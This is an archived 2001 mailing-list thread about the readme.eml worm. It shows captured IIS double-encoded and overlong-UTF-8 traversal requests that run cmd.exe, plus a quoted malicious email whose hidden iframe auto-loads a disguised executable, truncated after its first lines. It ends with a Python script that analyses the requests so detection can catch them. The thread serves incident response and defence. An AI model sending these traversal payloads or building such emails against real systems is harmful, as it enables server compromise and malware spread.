Hm, I have just checked my snort logs and seen a Code Red scan. The IP was pointing to www.forlog.fr. Results: crashes IE5 and IE6 when automatically loading a popup named readme.eml. Definitely a new worm ...

-----Original Message-----
From: Pedro Miller Rabinovitch [mailto:pedroat_private]
Sent: Tuesday, September 18, 2001 17:14
To: forensicsat_private
Cc: Cory McIntire; focus-msat_private; focus-idsat_private
Subject: New worm? 'readme.eml'

Hi, is this CodeBlue? Some new worm? Or just one I hadn't heard about?

It uses double-encoding exploits, and propagates both by adding JavaScript to the main page and by probing other systems...

Report: Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:

Date    Time  D Source IP       Sport Dport P
01Sep18 11:20 T 200.192.226.40  3933  80    T
01Sep18 11:20 T 200.192.226.40  3767  80    T
01Sep18 11:20 T 200.192.226.40  3572  80    T

SOURCE: 200.192.226.40

45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx   E...ba@.w..=...(xxxx
0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00   ...P{....~.NP."8.z..
47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35   GET /_vti_bin/..%255
63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35   c../..%255c../..%255
63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63   c../winnt/system32/c
6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31   md.exe?/c+dir HTTP/1
2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e   .0..Host: www..Connn
65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a            ection: close....

45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx   E....c@.w..:...(xxxx
0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00   ...P{....O..P."8....
47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35   GET /_mem_bin/..%255
63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35   c../..%255c../..%255
63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63   c../winnt/system32/c
6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31   md.exe?/c+dir HTTP/1
2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e   .0..Host: www..Connn
65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a            ection: close....

45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx   E...9e@.w.?....(xxxx
0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00   .].P{."6.LZ.P."8.6..
47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e   GET /msadc/..%255c..
2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e   /..%255c../..%255c/.
2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e   .%c1%1c../..%c1%1c..
2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79   /..%c1%1c../winnt/sy
73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69   stem32/cmd.exe?/c+di
72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77   r HTTP/1.0..Host: ww
77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73   w..Connnection: clos
65 0d 0a 0d 0a                                                e....

---------------

When I connected to the originating server (femm.tdkomm.com.br), I saw the normal web page for the institution, plus a pop-up window for http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as follows:

MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative; boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>

--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

Has anyone seen this?

Regards,
Pedro.

--
Pedro Miller Rabinovitch
Technology Manager
Cipher Technology
55-21-2579-3999
http://www.cipher.com.br

-----------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
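The request lines in the dumps above combine two IIS decoding tricks: "%255c" survives one round of percent-decoding as "%5c" and only becomes a backslash on a second round, and "%c1%1c" is an overlong two-byte sequence that a permissive UTF-8 decoder collapses to 0x5C as well. The example below, added here and not part of the thread, shows why a filter that normalizes the path after a single decode sees nothing wrong with the first two requests while a server that decodes twice resolves all three to /winnt/system32/cmd.exe. The three request lines are taken from the captured packets; the header block, the benign request and the lenient decoder model are constructed for illustration and approximate the behaviour, not IIS's actual code.

```python
"""Model how a permissive server decodes Nimda-style IIS request lines.

Added example, not from the original post. The decoder below is an
assumption about permissive behaviour, not reverse-engineered IIS code.
"""
from urllib.parse import unquote_to_bytes

# Request lines from the three captured packets above, with the header block
# the dumps show appended as CRLF-separated text (note "Connnection").
CAPTURED_REQUESTS = [
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
    "\r\nHost: www\r\nConnnection: close\r\n\r\n",
    "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
    "\r\nHost: www\r\nConnnection: close\r\n\r\n",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../"
    "winnt/system32/cmd.exe?/c+dir HTTP/1.0"
    "\r\nHost: www\r\nConnnection: close\r\n\r\n",
]
# Constructed benign request for contrast.
BENIGN_REQUEST = "GET /images/logo%20small.gif HTTP/1.0\r\nHost: www\r\nConnection: close\r\n\r\n"


def lenient_utf8_decode(data: bytes) -> str:
    """Decode bytes like a permissive two-byte UTF-8 decoder (assumed model).

    A strict decoder rejects 0xC1 0x1C: the lead byte is overlong and 0x1C is
    not a continuation byte. This model takes any 0xC0-0xDF lead byte plus the
    following byte and combines their low bits regardless, so 0xC1 0x1C gives
    ((0x01 << 6) | 0x1C) == 0x5C, a backslash. Other bytes pass through.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def server_view(target: str, decode_passes: int) -> str:
    """Return the request target after N rounds of percent + lenient UTF-8 decoding.

    Non-ASCII characters produced by one pass are handed to the next pass as
    UTF-8 (that is what unquote_to_bytes does with a str); the captured
    requests stay ASCII after decoding, so this does not affect them.
    """
    current = target
    for _ in range(decode_passes):
        current = lenient_utf8_decode(unquote_to_bytes(current))
    return current


def normalize(path: str) -> tuple:
    """Resolve '.' and '..' against a virtual web root, treating '\\' as '/'.

    Returns (normalized_path, escapes) where escapes counts '..' segments
    that tried to climb above the root. Any escape is a traversal attempt.
    """
    parts = []
    escapes = 0
    for seg in path.split("?", 1)[0].replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts:
                parts.pop()
            else:
                escapes += 1
            continue
        parts.append(seg)
    return "/" + "/".join(parts), escapes


def analyze(raw_request: str) -> dict:
    """Compare the single-decode and double-decode view of one HTTP request."""
    request_line, _, headers = raw_request.partition("\r\n")
    _method, target, _version = request_line.split(" ", 2)
    once_path, once_escapes = normalize(server_view(target, 1))
    twice_path, twice_escapes = normalize(server_view(target, 2))
    return {
        "single_decode_path": once_path,
        "single_decode_escapes": once_escapes,
        "double_decode_path": twice_path,
        "double_decode_escapes": twice_escapes,
        "targets_cmd": twice_path.lower().endswith("/cmd.exe"),
        # The misspelled header in the dumps is a cheap, specific indicator.
        "misspelled_connection_header": "\r\nconnnection:" in ("\r\n" + headers).lower(),
    }


if __name__ == "__main__":
    for req in CAPTURED_REQUESTS + [BENIGN_REQUEST]:
        print(req.split("\r\n", 1)[0])
        for key, value in analyze(req).items():
            print(f"  {key}: {value}")
```

Run stand-alone, the first two captured requests report zero escapes after a single decode and five after a double decode; the third already shows two escapes after one pass because the %c1%1c sequences need only the lenient UTF-8 step, and ten after two passes. The practical lesson for a filter or IDS rule is to canonicalize the way the target server does (decode repeatedly until the string stops changing, and treat backslash and overlong UTF-8 as path separators) before checking for traversal, rather than matching on a single-decoded path.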
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 13:06:15 PDT